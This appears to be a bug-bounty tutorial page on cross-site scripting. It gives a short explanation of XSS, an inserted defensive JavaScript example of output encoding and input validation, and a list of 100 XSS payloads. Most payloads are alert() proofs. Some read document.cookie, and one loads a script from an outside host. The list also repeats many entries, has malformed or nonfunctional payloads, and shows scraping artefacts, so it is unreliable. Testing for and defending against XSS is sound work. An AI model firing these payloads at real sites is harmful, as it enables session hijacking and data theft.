Cross-Site Scripting (XSS) | Bug Bounty

What Is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) is a type of security vulnerability that enables an attacker to inject malicious code into a website or web application. The attacker’s code is then executed in the user’s browser, allowing the attacker to take control of the user’s session, steal their data, or perform other malicious actions.

How does Cross-Site Scripting work?

Cross-Site Scripting works by exploiting a web application’s lack of proper input validation. A web application is vulnerable to XSS if it fails to validate user input, meaning that it does not properly restrict what type of data can be entered, and then includes that input in a page it serves. An attacker can use this to inject malicious code into the application’s output, where the user’s browser executes it as if it were part of the site.

What is the impact of Cross-Site Scripting?

The impact of Cross-Site Scripting can vary depending on the type of attack and the information that is being targeted. In general, XSS can be used to steal sensitive user information such as passwords, credit card numbers, or other confidential data. It can also be used to hijack user sessions, redirect users to malicious websites, or even execute malicious code on the user’s machine.

How can I protect myself from Cross-Site Scripting?

The best way to protect yourself from Cross-Site Scripting is to ensure that your web application is properly secured against this type of attack. This includes validating user input so that only the expected data is accepted, and sanitizing user input so that any malicious code is removed before it can be executed. Additionally, you should use an up-to-date web application firewall to protect against known XSS attacks.
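The following is an added example, not code from the original page, showing the sanitizing step as context-aware output encoding: the same comment rendered by a vulnerable function and by a hardened one. The `comment` object, the `BASE` origin and all function names are assumptions made for illustration.

```javascript
// Added example, not code from the original page.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode untrusted text for HTML element content or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Accept only http, https and mailto links; javascript:, data: and anything
// unparsable fall back to "#". The WHATWG URL parser removes tabs and newlines
// and trims control characters, so "javasc\nript:" is seen as "javascript:".
function safeUrl(value, base) {
  try {
    const url = new URL(String(value), base);
    return ['http:', 'https:', 'mailto:'].includes(url.protocol) ? url.href : '#';
  } catch {
    return '#';
  }
}

// Vulnerable: untrusted values are concatenated straight into markup.
function renderCommentUnsafe(c) {
  return `<a href="${c.site}">${c.name}</a><p>${c.text}</p>`;
}

// Hardened: each value is checked and encoded for the context it lands in.
function renderComment(c, base) {
  const href = escapeHtml(safeUrl(c.site, base));
  return `<a href="${href}">${escapeHtml(c.name)}</a><p>${escapeHtml(c.text)}</p>`;
}

// Constructed input reusing strings from this page's payload list.
const comment = {
  name: '"><script>alert(1)</script>',
  site: 'javasc\nript:alert(1)',
  text: '<img src=# onerror=alert(1)>',
};
const BASE = 'https://app.example/'; // hypothetical application origin

console.log(renderCommentUnsafe(comment)); // markup and script survive intact
console.log(renderComment(comment, BASE)); // inert text and href="#"
```

The scheme check runs before HTML encoding because encoding alone does not neutralize a `javascript:` link, which contains no characters that need escaping.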

How to Find Cross-Site Scripting

Finding Cross-Site Scripting (XSS) vulnerabilities can be done manually or using automated tools. Manual testing involves inspecting the code for potential vulnerabilities, while automated tools scan for them. Additionally, there are tools available that can be used to test for XSS vulnerabilities on a live website or web application.

Parameters to Find Cross-Site Scripting

When looking for Cross-Site Scripting (XSS) vulnerabilities, it is important to look for parameters that are vulnerable to injection. Some of the most common parameters that can be used to inject malicious code are URL parameters, form fields, cookies, and headers. Additionally, it is important to look for any parameters that are not properly validated or sanitized, as these can be used to inject malicious code.

– URL parameters

– Form fields

– Cookies

– Headers

– Query strings

– POST requests

– JavaScript variables

– HTML attributes

– Referer headers

– User-agent headers
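As an added example (not code from the original page), the sketch below treats every location in the list above as untrusted and applies one allow-list rule per input, rejecting anything without a rule. The field names, the rules and the sample request are hypothetical and constructed for illustration; validation of this kind complements output encoding and does not replace it.

```javascript
// Added example, not code from the original page. Field names, rules and the
// sample request are hypothetical and constructed for illustration.
const isHttpUrl = (v) => {
  try { return /^https?:$/.test(new URL(v).protocol); } catch { return false; }
};

// One allow-list rule per input the application actually reads.
const RULES = {
  'query.page': (v) => /^[0-9]{1,4}$/.test(v),
  'query.sort': (v) => ['asc', 'desc'].includes(v),
  'form.email': (v) => v.length <= 254 && /^[\w.+-]+@[\w-]+(\.[\w-]+)+$/.test(v),
  'cookie.theme': (v) => ['light', 'dark'].includes(v),
  'header.referer': isHttpUrl,
  'header.user-agent': (v) => v.length <= 256 && /^[\x20-\x7e]+$/.test(v) && !/[<>"'`]/.test(v),
};

// Flatten a request into [location.name, value] pairs so that query strings,
// form fields, cookies and headers all pass through the same check.
function untrustedInputs(req) {
  const pairs = [];
  const url = new URL(req.url, 'http://placeholder.invalid');
  for (const [k, v] of url.searchParams) pairs.push([`query.${k}`, v]);
  for (const [k, v] of Object.entries(req.form || {})) pairs.push([`form.${k}`, v]);
  for (const [k, v] of Object.entries(req.headers || {})) {
    if (k.toLowerCase() !== 'cookie') { pairs.push([`header.${k.toLowerCase()}`, v]); continue; }
    for (const part of v.split(';')) {
      const i = part.indexOf('=');
      if (i > 0) pairs.push([`cookie.${part.slice(0, i).trim()}`, part.slice(i + 1).trim()]);
    }
  }
  return pairs;
}

// Return the names of inputs that have no rule or fail their rule.
function rejectedInputs(req) {
  return untrustedInputs(req)
    .filter(([name, value]) => !(name in RULES) || !RULES[name](String(value)))
    .map(([name]) => name);
}

const sampleRequest = { // constructed request
  url: '/search?page=2&sort=%3Csvg%2Fonload%3Dalert(1)%3E',
  form: { email: 'user@example.com' },
  headers: {
    Cookie: 'theme=dark; lang="><script>alert(1)</script>',
    Referer: 'https://example.com/home',
    'User-Agent': 'Mozilla/5.0 <img src=# onerror=alert(1)>',
  },
};
console.log(rejectedInputs(sampleRequest));
```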

Tools for Finding Cross-Site Scripting

There are a number of tools available for finding Cross-Site Scripting (XSS) vulnerabilities. Some of the most popular tools include Burp Suite, OWASP Zed Attack Proxy (ZAP), and Acunetix. Additionally, there are a number of tools available that can be used to scan a website or web application for potential XSS vulnerabilities.

100 XSS Payloads

1. <script>alert(1)</script>
2. <img src=# onerror=alert(1)>
3. <svg/onload=alert(1)>
4. <script/src=data:,alert(1)>
5. <script>document.write('<script>alert(1)</script>')</script>
6. <iframe/src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
7. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
8. <iframe/src="javascript:alert(1)">
9. <img/src=` onerror=alert(1)>
10. <iframe/onload=alert(1)>
11. <svg><script>alert(1)</script>
12. "><script>alert(1)</script>
13. <script>alert(String.fromCharCode(88,83,83))</script>
14. <img/[email protected]&#32;&#13; onerror=alert(1)>
15. <svg><script>alert("XSS")</script>
16. <form><button formaction="javascript:alert(1)">
17. '"--><script>alert(1)</script>
18. <script>"alert(1)"</script>
19. <div/onmouseover='alert(1)'> style="x:"><script>alert(1)</script>
20. <iframe/src="data:text/html,<script>alert(1)</script>">
21. <a href="javasc&#x0A;ript:alert(1)">
22. <img/src=`%00` onerror=alert(1)>
23. <iframe/onreadystatechange=alert(1)>
24. <script>document.write("<script>alert(1)</script>")</script>
25. <img/[email protected]&#32;&#13;&#10; onerror=alert(1)>
26. <svg><script>a='hello';alert(1)</script>
27. <script>alert(/XSS/.source)</script>
28. <object/data="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">
29. <script>document.body.appendChild(document.createElement('script')).src='data:text/javascript,alert(1)';</script>
30. <iframe/src="data:text/html,<svg><script>alert(1)</script>">
31. <img/src=`%00`&NewLine; onerror=alert(1)>
32. <div/onmouseover='alert(1)'> style="x:"><script>alert(1)//
33. <script>alert(1)>
34. <img/src=`%00`&tab; onerror=alert(1)>
35. <iframe/onreadystatechange=alert(1)//
36. <script>alert(document.cookie)</script>
37. <script>confirm(1)</script>
38. <form><button formaction=javascript:alert(1)>
39. <script>prompt(1)</script>
40. <img/[email protected]&#32;&#13; onerror=prompt(1)>
41. <svg><script>prompt(1)</script>
42. <input autofocus onfocus=alert(1)>
43. <input onblur=alert(1) autofocus><input autofocus>
44. <script>alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))</script>
45. '--!><script>alert(1)</script>
46. <script>alert(String.fromCharCode(88,83,83))</script>
47. <img src=# onerror=alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
48. <svg><script>alert("XSS")</script>
49. <div/onmouseover='alert(atob("ZXZhbChhbmFseXNlKDIpKQ=="))'> style="x:"><script>alert(1)</script>
50. <script>"alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))"</script>
51. <img/src=`%00` onerror=alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
52. <iframe/src="data:text/html;base64,PHNjcmlwdD5hbGVydChhdG9iKCdFWnZhbChhbmFseXNlKDIpKScpKTwvc2NyaXB0Pg==">
53. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydChhdG9iKCdFWnZhbChhbmFseXNlKDIpKScpKTwvc2NyaXB0Pg==">
54. <iframe/src="javascript:alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))">
55. <img/src=`@&#32;&#13;` onerror=alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
56. <svg><script>alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))</script>
57. "<script>alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))</script>
58. <iframe/onload=alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
59. <div/onmouseover='alert(atob("ZXZhbChhbmFseXNlKDIpKQ=="))'> style="x:"><script>alert(1)</script>
60. <script>document.write("<script>alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))</script>")</script>
61. <img/src=`@&#32;&#13;&#10;` onerror=alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
62. <svg><script>a='hello';alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))</script>
63. <script>alert(/XSS/.source)</script>
64. <object/data="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoYXRvYignRVp2YWwoYW5hbHlzZSgyKSkpJyk+">
65. <script>document.body.appendChild(document.createElement("script")).src='data:text/javascript,alert(atob("ZXZhbChhbmFseXNlKDIpKQ=="))';</script>
66. <iframe/src="data:text/html,<svg><script>alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))</script>">
67. <img/src=`%00`&NewLine; onerror=alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
68. <div/onmouseover='alert(atob("ZXZhbChhbmFseXNlKDIpKQ=="))'> style="x:"><script>alert(atob("ZXZhbChhbmFseXNlKDIpKQ=="))//
69. <script>alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
70. <img/src=`%00`&tab; onerror=alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
71. <iframe/onreadystatechange=alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))//
72. <script>alert(document.cookie)</script>
73. <script>confirm(atob('ZXZhbChhbmFseXNlKDIpKQ=='))</script>
74. <form><button formaction=javascript:alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
75. <script>prompt(atob('ZXZhbChhbmFseXNlKDIpKQ=='))</script>
76. <img/src=`@&#32;&#13;` onerror=prompt(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
77. <svg><script>prompt(atob('ZXZhbChhbmFseXNlKDIpKQ=='))</script>
78. <input autofocus onfocus=alert(atob('ZXZhbChhbmFseXNlKDIpKQ=='))>
79. <input onblur=alert(atob('ZXZhbChhbmFseXNlKDIpKQ==')) autofocus><input autofocus>
80. <script src=//14.rs>
81. <form><input onfocus=alert(1) autofocus>
82. <form><input onblur=alert(1) autofocus><input autofocus>
83. <script itworksinallbrowsers>alert(1)</script>
84. <img src=# onerror=alert(1)>
85. <svg/onload=alert(1)>
86. <iframe/src="data:,alert(1)>
87. <script>document.write('<script>alert(1)</script>')</script>
88. <iframe/src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
89. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
90. <iframe/src="javascript:alert(1)">
91. <img/src=` onerror=alert(1)>
92. <iframe/onload=alert(1)>
93. <svg><script>alert(1)</script>
94. '"--><script>alert(1)</script>
95. <script>"alert(1)"</script>
96. <div/onmouseover='alert(1)'> style="x:"><script>alert(1)</script>
97. <iframe/src="data:text/html,<script>alert(1)</script>">
98. <a href="javasc&#x0A;ript:alert(1)">
99. <img/src=`%00` onerror=alert(1)>
100. <iframe/onreadystatechange=alert(1)>
